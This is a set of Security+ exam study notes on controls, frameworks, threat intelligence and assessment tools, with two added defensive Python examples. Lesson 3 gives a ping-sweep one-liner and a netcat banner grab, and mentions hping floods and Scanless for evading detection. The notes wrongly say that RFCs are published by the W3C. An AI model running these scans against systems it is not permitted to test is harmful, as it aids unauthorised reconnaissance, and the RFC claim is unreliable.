
Security+ (1)

The document outlines key concepts in information security, including roles, responsibilities, and security control categories. It discusses the cybersecurity framework's five functions and the importance of threat intelligence and threat actors. Additionally, it covers security assessment techniques and tools like Nmap for network discovery and vulnerability assessment.

Uploaded by

1hammond.jacob
Copyright
© All Rights Reserved

Lesson 1: Comparing Security Roles and Security Controls

Information Security
● Non-repudiation means that a subject cannot deny doing something, such as
creating, modifying, or sending a resource.

Cybersecurity Framework
● Information security and cybersecurity tasks can be classified as five functions:
○ Identify—develop security policies and capabilities. Evaluate risks, threats,
and vulnerabilities and recommend security controls to mitigate them.
○ Protect—procure/develop, install, operate, and decommission IT hardware
and software assets with security as an embedded requirement of every
stage of this operations life cycle.
○ Detect—perform ongoing, proactive monitoring to ensure that controls are
effective and capable of protecting against new types of threats.
○ Respond—identify, analyze, contain, and eradicate threats to systems and
data security.
○ Recover—implement cybersecurity resilience to restore systems and data
if other controls are unable to prevent attacks.

Information Security Roles and Responsibilities


● Information Systems Security Officer (ISSO): Organizational role with technical
responsibilities for implementation of security policies, frameworks, and controls.
● Chief Information Security Officer (CISO): Typically the job title of the person with
overall responsibility for information assurance and systems security.
● External responsibility for security (due care or liability) lies mainly with directors
or owners.

Information Security Business Units


● Security Operations Center:
○ A location where security professionals monitor and protect critical
information assets across other business functions, such as finance,
operations, sales/marketing, and so on.
● DevSecOps:
○ A combination of software development and systems operations; the term
refers to the practice of integrating one discipline with the other.

Security Control Categories


● A security control is something designed to give a system or data asset the
properties of confidentiality, integrity, availability, and non-repudiation.
● Controls can be divided into three broad categories, representing the way the
control is implemented:
○ Technical—the control is implemented as a system (hardware, software,
or firmware).
■ For example, firewalls, antivirus software, and OS access control
models are technical controls.
○ Operational—the control is implemented primarily by people rather than
systems.
■ For example, security guards and training programs.
○ Managerial—the control gives oversight of the information system.
■ Examples could include risk identification or a tool allowing the
evaluation and selection of other security controls.

Security Control Functional Types


● Preventive—the control acts to eliminate or reduce the likelihood that an attack
can succeed.
○ Access control lists (ACL) configured on firewalls and file system
objects are preventative-type controls.
○ Anti-malware software also acts as a preventative control.
● Detective—the control may not prevent or deter access, but it will identify and
record any attempted or successful intrusion.
○ A detective control operates during the progress of an attack.
○ Logs provide one of the best examples of detective-type controls.
● Corrective—the control acts to eliminate or reduce the impact of an intrusion
event.
○ A corrective control is used after an attack.
○ A good example is a backup system that can restore data that was
damaged during an intrusion.

NIST Cybersecurity Framework


● A cybersecurity framework (CSF) is a list of activities and objectives
undertaken to mitigate risks.
● The use of a framework allows an organization to make an objective statement of
its current cybersecurity capabilities, identify a target level of capability, and
prioritize investments to achieve that target.

ISO and Cloud Frameworks


● ISO 27k:
○ A comprehensive set of standards for information security, including best
practices for security and risk management, compliance, and technical
implementation.
● ISO 31k:
○ An overall framework for enterprise risk management (ERM).
○ ERM considers risks and opportunities beyond cybersecurity by including
financial, customer service, competition, and legal liability factors.
● Cloud Security Alliance:
○ Produces various resources to assist cloud service providers (CSP) in
setting up and delivering secure cloud platforms.
○ Security Guidance: a best practice summary analyzing the unique
challenges of cloud environments and how on-premises controls can be
adapted to them.
○ Enterprise Reference Architecture: best practice methodology and tools
for CSPs to use in architecting cloud solutions.
○ Cloud Controls Matrix: lists specific controls and assessment guidelines
that should be implemented by CSPs.
● Statements on Standards for Attestation Engagements (SSAE):
○ Audit specifications designed to ensure that cloud/hosting providers meet
professional standards.
○ Service Organization Control (SOC2):
■ Evaluates the internal controls implemented by the service provider
to ensure compliance with Trust Services Criteria (TSC) when
storing and processing customer data.
○ SOC3:
■ A less detailed report certifying compliance with SOC2. SOC3
reports can be freely distributed.

Benchmarks and Secure Configuration Guides


● Center For Internet Security (CIS):
○ A not-for-profit organization (founded partly by SANS). It publishes the
well-known "Top 20 Critical Security Controls" (or system design
recommendations).
● OS/Network Appliance Platform/Vendor-specific Guides:
○ Operating system (OS) best practice configuration lists the settings and
controls that should be applied for a computing platform to work in a
defined role.
● Open Web Application Security Project (OWASP):
○ A not-for-profit, online community that publishes several secure application
development resources, such as the Top 10 list of the most critical
application security risks.

Lesson 2: Explaining Threat Actors and Threat Intelligence

Vulnerability, Threat, and Risk


● Vulnerability is a weakness that could be triggered accidentally or exploited
intentionally to cause a security breach.
○ Examples of vulnerabilities include improperly configured or installed
hardware or software.
● Threat is the potential for someone or something to exploit a vulnerability and
breach security.
● Risk is the likelihood and impact (or consequence) of a threat actor exploiting a
vulnerability.

Attributes of Threat Actors


● Intent describes what an attacker hopes to achieve from the attack, while
motivation is the attacker's reason for perpetrating the attack.

Hackers, Script Kiddies, and Hacktivists


● Script Kiddies:
○ Someone who uses hacker tools without necessarily understanding how
they work or having the ability to craft new attacks.
● Hacktivists:
○ A threat actor that is motivated by a social issue or political cause.
○ Might attempt to obtain and release confidential information to the public
domain.

State Actors and Advanced Persistent Threats


● Advanced Persistent Threat (APT):
○ An attacker's ability to obtain, maintain, and diversify access to network
systems using exploits and malware.
● State actors have been implicated in many attacks, particularly on energy and
health network systems.

Criminal Syndicates and Competitors


● A criminal syndicate can operate across the Internet from different jurisdictions
than its victim, increasing the complexity of prosecution.
● It is not inconceivable that a rogue business might use cyber espionage against
its competitors.
○ Such attacks could aim at theft or at disrupting a competitor's business or
damaging their reputation.
● Shadow IT:
○ Where users purchase or introduce computer hardware or software to the
workplace without the sanction of the IT department and without going
through a procurement and security analysis process.

Attack Surface and Attack Vectors


● The attack surface is all the points at which a malicious threat actor could try to
exploit a vulnerability.
● Attack Vector: the path that a threat actor uses to gain access to a secure
system.
● Direct Access: this is a type of physical or local attack.
○ The threat actor could exploit an unlocked workstation, use a boot disk to
try to install malicious tools, or steal a device, for example.
● Removable Media:
○ The attacker conceals malware on a USB thumb drive or memory card
and tries to trick employees into connecting the media to a PC, laptop, or
smartphone.
● Email:
○ The attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments.
● Remote and Wireless:
○ The attacker either obtains credentials for a remote access or wireless
connection to the network or cracks the security protocols used for
authentication.
● Supply Chain:
○ Rather than attack the target directly, a threat actor may seek ways to
infiltrate it via companies in its supply chain.
● Web and Social Media:
○ Malware may be concealed in files attached to posts or presented as
downloads.
● Cloud:
○ Many companies now run part or all of their network services via
Internet-accessible clouds.

Threat Research Sources


● Threat research: a counterintelligence gathering effort in which security
companies and researchers attempt to discover the tactics, techniques, and
procedures (TTPs) of modern cyber adversaries.
● Dark Net:
○ A network established as an overlay to Internet infrastructure by software,
such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize
usage and prevent a third party from knowing about the existence of the
network or analyzing any activity taking place over the network.
● Dark Web:
○ Sites, content, and services accessible only over a dark net.

Threat Intelligence Providers

● Behavioral threat research—narrative commentary describing examples of
attacks and TTPs gathered through primary research sources.
● Reputational threat intelligence—lists of IP addresses and domains associated
with malicious behavior, plus signatures of known file-based malware.
● Threat data—computer data that can correlate events observed on a customer's
own networks and logs with known TTP and threat actor indicators.
● Cyber Threat Intelligence (CTI): The process of investigating, collecting,
analyzing, and disseminating information about emerging threats and threat
sources.
● Threat intelligence platforms and feeds are supplied as one of four different
commercial models:
○ Closed/proprietary—the threat research and CTI data is made available
as a paid subscription to a commercial threat intelligence platform.
○ Vendor websites—proprietary threat intelligence is not always provided at
cost.
■ All types of security, hardware, and software vendors make huge
amounts of threat research available via their websites as a general
benefit to their customers.
○ Public/private information sharing centers—in many critical industries,
Information Sharing and Analysis Centers (ISACs) have been set up to
share threat intelligence and promote best practice.
○ Open source intelligence (OSINT)—some companies operate threat
intelligence services on an open-source basis, earning income from
consultancy rather than directly from the platform or research effort.

Other Threat Intelligence Research Options


● Academic journals—results from academic researchers and not-for-profit trade
bodies and associations, such as the IEEE, are published as papers in journals.
● Conferences—security conferences are hosted and sponsored by various
institutions and provide an opportunity for presentations on the latest threats and
technologies.
● Request for Comments (RFC)—when a new technology is accepted as a web
standard, it is published as an RFC by the W3C.
● Social media—companies and individual researchers and practitioners write
informative blogs or social media feeds.

Tactics, Techniques, and Procedures and Indicators of Compromise


● A tactic, technique, or procedure (TTP) is a generalized statement of
adversary behavior.
● TTPs categorize behaviors in terms of campaign strategy and approach (tactics),
generalized attack vectors (techniques), and specific intrusion tools and methods
(procedures).
● An indicator of compromise (IoC) is a residual sign that an asset or network
has been successfully attacked or is continuing to be attacked.

Threat Data Feeds


● Threat Data Feed: Signatures and pattern-matching rules supplied to analysis
platforms as an automated feed.
● Structured Threat Information eXpression (STIX):
○ Designed to provide a format for this type of automated feed so that
organizations can share CTI.
○ The framework describes standard terminology for IoCs and ways of indicating
relationships between them.
● Trusted Automated eXchange of Indicator Information (TAXII):
○ Provides a means for transmitting CTI data between servers and clients.
○ Subscribers to the service obtain updates to the data to load into analysis
tools over TAXII.
● Automated Indicator Sharing (AIS):
○ A service offered by the Department of Homeland Security (DHS) for
companies to participate in threat intelligence sharing.
● Threat Maps:
○ An animated graphic showing the source, target, and type of attacks that
have been detected by a CTI platform.
● File/Code Repositories:
○ A file/code repository such as virustotal.com holds signatures of known
malware code.
● Vulnerability Databases and Vulnerability Feeds:
○ Common Vulnerabilities and Exposures (CVE): Scheme for identifying
vulnerabilities developed by MITRE and adopted by NIST.
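
How a STIX feed is consumed on the defender's side, as an added example that is not part of the original notes: it loads a constructed STIX 2.1 bundle, follows the "indicates" relationships, and correlates the indicators with constructed firewall and DNS log lines. The log layout, field names (dst, name), object names and IDs are assumptions made for the example, and only single-comparison patterns are evaluated; anything more complex is reported as skipped rather than guessed at.

```python
import json
import re
from datetime import datetime

# Constructed STIX 2.1 bundle: documentation-range addresses, made-up names and IDs.
BUNDLE_JSON = """
{"type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000000", "objects": [
 {"type": "malware", "spec_version": "2.1", "is_family": false, "name": "ExampleRAT",
  "id": "malware--aaaaaaaa-0000-4000-8000-000000000001",
  "created": "2024-01-10T09:00:00Z", "modified": "2024-01-10T09:00:00Z"},
 {"type": "indicator", "spec_version": "2.1", "name": "ExampleRAT C2 address",
  "id": "indicator--aaaaaaaa-0000-4000-8000-000000000002",
  "created": "2024-01-10T09:00:00Z", "modified": "2024-01-10T09:00:00Z",
  "pattern_type": "stix", "pattern": "[ipv4-addr:value = '198.51.100.7']",
  "valid_from": "2024-01-10T09:00:00Z"},
 {"type": "indicator", "spec_version": "2.1", "name": "Phishing domain",
  "id": "indicator--aaaaaaaa-0000-4000-8000-000000000003",
  "created": "2024-01-10T09:00:00Z", "modified": "2024-01-10T09:00:00Z",
  "pattern_type": "stix", "pattern": "[domain-name:value = 'login.example.net']",
  "valid_from": "2024-01-10T09:00:00Z"},
 {"type": "indicator", "spec_version": "2.1", "name": "Retired C2 address",
  "id": "indicator--aaaaaaaa-0000-4000-8000-000000000004",
  "created": "2023-01-01T00:00:00Z", "modified": "2023-06-01T00:00:00Z",
  "pattern_type": "stix", "pattern": "[ipv4-addr:value = '203.0.113.9']",
  "valid_from": "2023-01-01T00:00:00Z", "valid_until": "2023-06-01T00:00:00Z"},
 {"type": "indicator", "spec_version": "2.1", "name": "Two staging domains",
  "id": "indicator--aaaaaaaa-0000-4000-8000-000000000005",
  "created": "2024-01-10T09:00:00Z", "modified": "2024-01-10T09:00:00Z",
  "pattern_type": "stix", "valid_from": "2024-01-10T09:00:00Z",
  "pattern": "[domain-name:value = 'a.example.org' OR domain-name:value = 'b.example.org']"},
 {"type": "relationship", "spec_version": "2.1", "relationship_type": "indicates",
  "id": "relationship--aaaaaaaa-0000-4000-8000-000000000006",
  "created": "2024-01-10T09:00:00Z", "modified": "2024-01-10T09:00:00Z",
  "source_ref": "indicator--aaaaaaaa-0000-4000-8000-000000000002",
  "target_ref": "malware--aaaaaaaa-0000-4000-8000-000000000001"}
]}
"""

# Constructed log lines; the key=value layout is an assumption for this example.
LOG_LINES = [
    "2024-02-01T12:00:05Z fw allow src=10.1.0.23 dst=198.51.100.7 dport=443",
    "2024-02-01T12:01:10Z dns query client=10.1.0.40 name=login.example.net",
    "2024-02-01T12:02:30Z fw allow src=10.1.0.23 dst=192.0.2.50 dport=80",
    "2024-02-01T12:03:00Z fw allow src=10.1.0.77 dst=203.0.113.9 dport=22",
]

# Matches only a pattern made of one equality test on an object's "value" property.
SIMPLE = re.compile(r"\[\s*([a-z0-9-]+):value\s*=\s*'([^']+)'\s*\]")
# Which log field carries each observable type (tied to the sample log layout).
FIELD_FOR_TYPE = {"ipv4-addr": "dst", "domain-name": "name"}


def parse_ts(value):
    """Parse a UTC timestamp ending in Z into a timezone-aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def load_indicators(bundle):
    """Return (usable indicators, ids of indicators whose pattern was not evaluated)."""
    objects = bundle["objects"]
    names = {o["id"]: o.get("name", o["id"]) for o in objects}
    indicates = {}
    for o in objects:
        if o["type"] == "relationship" and o["relationship_type"] == "indicates":
            target = names.get(o["target_ref"], o["target_ref"])
            indicates.setdefault(o["source_ref"], []).append(target)
    usable, skipped = [], []
    for o in objects:
        if o["type"] != "indicator":
            continue
        m = SIMPLE.fullmatch(o["pattern"]) if o["pattern_type"] == "stix" else None
        if m is None or m.group(1) not in FIELD_FOR_TYPE:
            skipped.append(o["id"])
            continue
        usable.append({
            "name": o.get("name", o["id"]),
            "field": FIELD_FOR_TYPE[m.group(1)],
            "value": m.group(2),
            "valid_from": parse_ts(o["valid_from"]),
            "valid_until": parse_ts(o["valid_until"]) if "valid_until" in o else None,
            "indicates": indicates.get(o["id"], []),
        })
    return usable, skipped


def match_logs(lines, indicators):
    """Return (timestamp, indicator name, value, related objects) for each hit."""
    hits = []
    for line in lines:
        stamp, *rest = line.split()
        fields = dict(tok.split("=", 1) for tok in rest if "=" in tok)
        when = parse_ts(stamp)
        for ind in indicators:
            if fields.get(ind["field"]) != ind["value"]:
                continue
            expired = ind["valid_until"] is not None and when >= ind["valid_until"]
            if when < ind["valid_from"] or expired:
                continue  # indicator was not valid at the time of the event
            hits.append((stamp, ind["name"], ind["value"], ind["indicates"]))
    return hits


def demo():
    usable, skipped = load_indicators(json.loads(BUNDLE_JSON))
    return match_logs(LOG_LINES, usable), skipped


if __name__ == "__main__":
    found, not_evaluated = demo()
    for hit in found:
        print(hit)
    print("not evaluated:", not_evaluated)
```

The connection to 203.0.113.9 produces no hit because that indicator's validity window closed before the event, which is why stale feed entries should carry valid_until rather than linger.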

Artificial Intelligence and Predictive Analysis

● Machine Learning (ML): uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an object as a type, working out
the best next move in a game, and so on.
● One of the goals of using AI-backed threat intelligence is to perform predictive
analysis, or threat forecasting.
○ This means that the system can anticipate a particular type of attack and
possibly the identity of the threat actor before the attack is fully realized.

Lesson 3: Performing Security Assessments

Ipconfig, Ping, and ARP


● Topology discovery (or "footprinting"):
○ Means scanning for hosts, IP ranges, and routes between networks to
map out the structure of the target network.
● Ping:
○ You can use ping with a simple script to perform a sweep of all the IP
addresses in a subnet.
○ The following example will scan the 10.1.0.0/24 subnet from a Windows
machine:
■ for /l %i in (1,1,255) do @ping -n 1 -w 100 10.1.0.%i | find /i "reply"

Route and Traceroute


● Pathping:
○ Provides statistics for latency and packet loss along a route over a longer
measuring period.
○ pathping is a Windows tool; the equivalent on Linux is mtr.
● In a security context, high latency at the default gateway compared to a baseline
might indicate a man-in-the-middle attack.
● High latency on other hops could be a sign of denial of service, or could just
indicate network congestion.

IP Scanners and NMAP


● NMAP:
○ When used without switches, the default behavior of Nmap is to
ping and send a TCP ACK packet to ports 80 and 443 to determine
whether a host is present.
○ On a local network segment, Nmap will also perform ARP and ND
(Neighbor Discovery) sweeps.

Service Discovery and NMAP


● Service Discovery:
○ Work out which operating systems are in use, which network services each
host is running, and, if possible, which application software is
underpinning those services.
● Service Discovery with Nmap:
○ When Nmap completes a host discovery scan, it will report on the state of
each port scanned for each IP address in the scope.
○ TCP SYN (-sS)—this is a fast technique also referred to as half-open
scanning, as the scanning host requests a connection without
acknowledging it.
■ The target's response to the scan's SYN packet identifies the port
state.
○ UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap
needs to wait for a response or timeout to determine the port state, so
UDP scanning can take a long time.
○ Port range (-p)—by default, Nmap scans 1000 commonly used ports, as
listed in its configuration file.
● Service and Version Detection and OS Fingerprinting with Nmap:
○ The detailed analysis of services on a particular host is often called
fingerprinting.
■ This is because each OS or application software that underpins a
network service responds to probes in a unique way.
■ This allows the scanning software to guess at the software name
and version, without having any sort of privileged access to the
host.
● When services are discovered, you can use Nmap with the -sV or -A switch to
probe a host more intensively to discover the following information:
○ Protocol—do not assume that a port is being used for its "well known"
application protocol.
○ Application name and version—the software operating the port, such as
Apache web server or Internet Information Services (IIS) web server.
○ OS type and version—use the -O switch to enable OS fingerprinting (or -A
to use both OS fingerprinting and version discovery).
○ Device type—not all network devices are PCs. Nmap can identify switches
and routers or other types of networked devices, such as NAS boxes,
printers, and webcams.
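
What a defender does with service discovery results, as an added example that is not part of the original notes: it parses Nmap grepable output (a scan saved with -oG) and compares each open port and detected service against an approved baseline. The scan text, hosts, versions and the baseline itself are constructed for the example.

```python
import re

# Constructed sample in Nmap grepable (-oG) layout; fields are tab-separated.
SCAN_OUTPUT = "".join([
    "# constructed sample scan of 10.1.0.0/24\n",
    "Host: 10.1.0.10 (web01)\tStatus: Up\n",
    "Host: 10.1.0.10 (web01)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, "
    "80/open/tcp//http//Apache httpd 2.4.52/, 8443/open/tcp//ssl|http//nginx/, "
    "3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)\n",
    "Host: 10.1.0.20 (db01)\tStatus: Up\n",
    "Host: 10.1.0.20 (db01)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, "
    "3306/open/tcp//mysql//MySQL 8.0.33/, 8080/open/tcp//ssh//OpenSSH 7.4/\n",
    "Host: 10.1.0.99 ()\tStatus: Up\n",
    "Host: 10.1.0.99 ()\tPorts: 23/open/tcp//telnet///\n",
])

# Hypothetical approved baseline: host -> {(port, protocol): expected service}.
BASELINE = {
    "10.1.0.10": {(22, "tcp"): "ssh", (80, "tcp"): "http"},
    "10.1.0.20": {(22, "tcp"): "ssh", (3306, "tcp"): "mysql", (8080, "tcp"): "http"},
}


def parse_gnmap(text):
    """Return {ip: [port records]} from grepable output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment or summary line
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            # Split only where a new "port/" entry starts, so a comma inside
            # a version string does not break an entry apart.
            for entry in re.split(r",\s*(?=\d+/)", field[len("Ports: "):]):
                parts = (entry.split("/") + [""] * 7)[:7]
                port, state, proto, _owner, service, _rpc, version = parts
                hosts.setdefault(ip, []).append({
                    "port": int(port), "state": state, "proto": proto,
                    "service": service, "version": version,
                })
    return hosts


def audit(scan, baseline):
    """Return sorted findings: (ip, port, proto, kind, detail)."""
    findings = []
    for ip, ports in scan.items():
        approved = baseline.get(ip)
        for p in ports:
            if p["state"] != "open":
                continue  # filtered/closed ports are not exposed services
            key = (p["port"], p["proto"])
            if approved is None:
                findings.append((ip, *key, "host-not-in-baseline", p["service"]))
            elif key not in approved:
                findings.append((ip, *key, "unapproved-port", p["service"]))
            elif approved[key] != p["service"]:
                # The port is approved, but something else is answering on it.
                detail = "expected %s, detected %s (%s)" % (
                    approved[key], p["service"], p["version"])
                findings.append((ip, *key, "service-mismatch", detail))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(parse_gnmap(SCAN_OUTPUT), BASELINE):
        print(finding)
```

The service-mismatch finding on 8080/tcp is the case the notes warn about: the port number alone suggested a web service, and only version detection showed SSH listening there.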

Netstat and Nslookup


● Netstat:
○ Shows the state of TCP/UDP ports on the local machine.
○ You may also be able to identify suspect remote connections to services
on the local host or from the host to remote IP addresses.
● Nslookup/dig:
○ Queries name records for a given domain using a particular DNS resolver.
○ An attacker may test a network to find out if the DNS service is
misconfigured.
■ A misconfigured DNS may allow a zone transfer, which will give the
attacker the complete records of every host in the domain,
revealing a huge amount about the way the network is configured.

Other Reconnaissance and Discovery

● theHarvester:
○ A tool for gathering open-source intelligence (OSINT) for a particular domain
or company name.
○ It works by scanning multiple public data sources to gather emails, names,
subdomains, IPs, URLs and other relevant data.
● Dnsenum:
○ While you can use tools such as dig and whois to query name records
and hosting details and to check that external DNS services are not
leaking too much information, a tool such as dnsenum packages a number
of tests into a single query.
● Scanless:
○ Utility that runs port scans through third-party websites to evade detection.
● Curl:
○ A command line client for performing data transfers over many types of
protocol.
○ This tool can be used to submit HTTP GET, POST, and PUT requests as
part of web application vulnerability testing.
● Nessus:
○ One of the best-known commercial vulnerability scanners, produced by
Tenable Network Security.

Packet Capture and TCPDump


● Packet Analysis: refers to deep-down frame-by-frame scrutiny of captured
frames.
● Protocol Analysis: means using statistical tools to analyze a sequence of
packets, or packet trace.
● TCPDump: A command-line packet sniffing utility.

Packet Analysis and Wireshark


● You can either analyze a live capture or open a saved capture (.pcap) file.

Packet Injection and Replay

● Network sniffing software libraries allow frames to be inserted (or injected) into
the network stream.
● Hping:
○ An open-source spoofing tool that provides a penetration tester with the
ability to craft network packets to exploit vulnerable firewalls and IDSs.
○ Perform the following types of test:
■ Host/port detection and firewall testing—like Nmap, hping can be
used to probe IP addresses and TCP/UDP ports for responses.
■ Traceroute—if ICMP is blocked on a local network, hping offers
alternative ways of mapping out network routes.
■ Denial of service (DoS)—hping can be used to perform flood-
based DoS attacks from randomized source IPs.
● Tcpreplay:
○ Takes previously captured traffic that has been saved to a .pcap file and
replays it through a network interface.

Exploitation Frameworks
● Remote Access Trojan:
○ Malware that gives an adversary the means of remotely accessing the
network.
● Exploitation Framework:
○ Uses the vulnerabilities identified by an automated scanner and launches
scripts or software to attempt to deliver matching exploits.
● Metasploit:
○ A platform for launching modularized attacks against known software
vulnerabilities.
● Sn1per:
○ A framework designed for penetration test reporting and evidence gathering.

Netcat

● Computer networking utility for reading and writing raw data over a network
connection, and can be used for port scanning and fingerprinting.
● The following command attempts to connect to the HTTP port on a server and
return any banner by sending the "head" HTTP keyword:
○ echo "head" | nc 10.1.0.1 -v 80

Software Vulnerabilities and Patch Management


● Operating system (OS)—an application exploit will run with the permissions of
the logged on user, which will hopefully be limited.
● Firmware—vulnerabilities can exist in the BIOS/UEFI firmware that controls the
boot process for PCs.
○ There can also be bugs in device firmware, such as network cards and
disk controllers.

Weak Host Configurations


● Default Settings:
○ Relying on the manufacturer default settings when deploying an appliance
or software applications is one example of weak configuration.
● Unsecured Root Accounts:
○ The root account, referred to as the default Administrator account in
Windows or generically as the superuser, has no restrictions set over
system access.
● Open Permissions:
○ Refers to provisioning data files or applications without differentiating
access rights for user groups.

Weak Network Configurations


● Open Ports and Services:
○ If the service is security-critical (such as a remote administration
interface), restrict endpoints that are allowed to access the service by IP
address or address range.
○ Disable services that are installed by default but that are not needed.
● Unsecure Protocols:
○ An unsecure protocol is one that transfers data as cleartext.
● Weak Encryption:
○ The key is generated from a simple password, making it vulnerable to
guessing attempts by brute-force enumeration.
○ The algorithm or cipher used for encryption has known weaknesses that
allow brute-force enumeration.
● Errors:
○ Weakly configured applications may display unformatted error messages
under certain conditions.

Impacts from Vulnerabilities


● Data Breach:
○ Where confidential data is read, transferred, modified, or deleted without
authorization.
○ A breach can also be described as a data leak.
● Data Exfiltration:
○ Methods and tools by which an attacker transfers data without
authorization from the victim's systems to an external network or media.
○ Unlike a data breach, a data exfiltration event is always intentional and
malicious.
● Data Loss:
○ Where information becomes unavailable, either permanently or
temporarily.
● Availability Loss Impacts:
○ Availability is sometimes overlooked as a security attribute compared to
confidentiality and integrity.

Third-Party Risks

● Vendor Management:
○ A process for selecting supplier companies and evaluating the risks inherent
in relying on a third-party product or service.
○ Larger companies will usually ask vendors to complete a detailed audit
process to ensure that they meet the required standards.
○ System Integration:
■ The process of using components/services from multiple vendors to
implement a business workflow.
● Data Storage:
○ Ensure the same protections for data as though it were stored
on-premises, including authorization and access management and
encryption.
○ Monitor and audit third-party access to data storage to ensure it is being
used only in compliance with data sharing agreements and nondisclosure
agreements.

Security Assessments
● Network reconnaissance and discovery is used to identify hosts, network
topology, and open services/ports, establishing an overall attack surface.
○ Various types of security assessments can be used to test these hosts
and services for vulnerabilities.
● SP 800-115 identifies three principal activities within an assessment:
○ Testing the object under assessment to discover vulnerabilities or to prove
the effectiveness of security controls.
○ Examining assessment objects to understand the security system and
identify any logical weaknesses. This might highlight a lack of security
controls or a common misconfiguration.
○ Interviewing personnel to gather information and probe attitudes toward
and understanding of security.
● A vulnerability assessment is an evaluation of a system's security and ability to
meet compliance requirements based on the configuration state of the system.

Vulnerability Scan Types


● Network Vulnerability Scanner:
○ Designed to test network hosts, including client PCs, mobile devices,
servers, routers, and switches.
○ It examines an organization's on-premises systems, applications, and
devices and compares the scan results to configuration templates plus
lists of known vulnerabilities.
○ Typical results from a vulnerability assessment will identify missing
patches, deviations from baseline configuration templates, and other
related vulnerabilities.
○ 1. The first phase of scanning might be to run a detection scan to discover
hosts on a particular IP subnet.
○ 2. In the next phase of scanning, a target range of hosts is probed to detect
running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, antivirus configuration, and so
on.
● Application and Web Application Scanners:
○ A dedicated application scanner is configured with more detailed and
specific scripts to test for known attacks, as well as scanning for missing
patches and weak configurations.
○ The best-known class of application scanners is web application
scanners.

Common Vulnerabilities and Exposures


● Vulnerability Feed:
○ A synchronizable list of data and scripts used to check for vulnerabilities.
○ Also referred to as plug-ins or network vulnerability tests (NVTs).
● Secure Content Automation Protocol (SCAP):
○ A NIST framework that outlines various accepted practices for automating
vulnerability scanning.
○ SCAP defines ways to compare the actual configuration of a system to a
target-secure baseline plus various systems of common identifiers.
● Common Vulnerabilities and Exposures (CVE):
○ A dictionary of vulnerabilities in published operating systems and
applications software.
○ An identifier in the format: CVE-YYYY-####, where YYYY is the year the
vulnerability was discovered, and #### is at least four digits that indicate
the order in which the vulnerability was discovered.
○ A brief description of the vulnerability.
○ A reference list of URLs that supply more information on the vulnerability.
○ The date the vulnerability entry was created.
● Common Vulnerability Scoring System (CVSS):
○ A risk management approach to quantifying vulnerability data and then
taking into account the degree of risk to different types of systems or
information.

Intrusive Versus Non-Intrusive Scanning


● Non-intrusive (or passive) scanning means analyzing indirect evidence, such
as the types of traffic generated by a device.
○ This type of scanning has the least impact on the network and on hosts,
but is less likely to identify vulnerabilities comprehensively.
○ You might use passive scanning as a technique where active scanning
poses a serious risk to system stability, such as scanning print devices,
VoIP handsets, or embedded systems networks.
● Active scanning means probing the device's configuration using some sort of
network connection with the target.

Credentialed Versus Non-Credentialed Scanning

● A non-credentialed scan is one that proceeds by directing test packets at a host
without being able to log on to the OS or application.
○ The test routines may be able to include things such as using default
passwords for service accounts and device management interfaces, but
they are not given privileged access.
○ The most appropriate technique for external assessment of the network
perimeter or when performing web application scanning.
● A credentialed scan is given a user account with logon rights to various hosts,
plus whatever other permissions are appropriate for the testing routines.
○ This sort of test allows much more in-depth analysis, especially in
detecting when applications or security settings may be misconfigured.

False Positives, False Negatives, and Log Review


● A false positive is something that is identified by a scanner or other assessment
tool as being a vulnerability, when in fact it is not.
● False negatives are potential vulnerabilities that are not identified in a scan.
○ This risk can be mitigated somewhat by running repeat scans periodically.
● Reviewing related system and network logs can enhance the vulnerability report
validation process.

Configuration Review
● A vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks.
● It might try to identify whether there is a lack of controls that might be considered
necessary or whether there is any misconfiguration of the system that would
make the controls less effective or ineffective.
● Security content automation protocol (SCAP) allows compatible scanners to
determine whether a computer meets a configuration baseline.
● Some scanners measure systems and configuration settings against best
practice frameworks. This is referred to as a compliance scan.

Threat Hunting

● Threat hunting is an assessment technique that utilizes insights gained from
threat intelligence to proactively discover whether there is evidence of TTPs
already present within the network or system.
● Intelligence fusion and threat data—threat hunting can be performed by manual
analysis of network and log data, but this is a very lengthy process.
● Maneuver—when investigating a suspected live threat, you must remember the
adversarial nature of hacking.
○ In threat hunting, the concept that threat actor and defender may use
deception or counter attacking strategies to gain positional advantage.

Rules of Engagement
● Agreeing scope, operational parameters, and reporting requirements for a
penetration test.
● Black Box: the consultant is given no privileged information about the network and its
security systems.
● White Box: the consultant is given complete access to information about the
network. This type of test is sometimes conducted as a follow-up to a black box
test to fully evaluate flaws discovered during the black box test.
● Grey Box: the consultant is given some information; typically, this would
resemble the knowledge of junior or non-IT staff to model particular types of
insider threats.
● Bug Bounty: a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities.

Passive and Active Reconnaissance


● Passive reconnaissance is not likely to alert the target of the investigation as it
means querying publicly available information.
● Active reconnaissance has more risk of detection. Active techniques might
involve gaining physical access to premises or using scanning tools on the
target's web services and other networks.
● Footprinting: using software tools, such as Nmap (nmap.org), to obtain
information about a host or network topology.
● War Driving: The practice of using a Wi-Fi sniffer to detect WLANs and then
either making use of them (if they are open/unsecured) or trying to break into
them (using WEP and WPA cracking tools).
● Drones/unmanned aerial vehicle (UAV): allow the tester to reconnoiter campus
premises, and even to perform war driving from the air (war flying).

Pen Test Attack Life Cycle


● Persistence: the tester's ability to reconnect to the compromised host and use it
as a remote access tool (RAT) or backdoor.
○ To do this, the tester must establish a command and control (C2 or C&C)
network to use to control the compromised host, upload additional attack
tools, and download exfiltrated data.
● Privilege Escalation: persistence is followed by further reconnaissance, where
the pen tester attempts to map out the internal network and discover the services
running on it and accounts configured to access it.
● Lateral Movement: gaining control over other hosts.
○ This is done partly to discover more opportunities to widen access
(harvesting credentials, detecting software vulnerabilities, and gathering
other such "loot"), partly to identify where valuable data assets might be
located, and partly to evade detection.
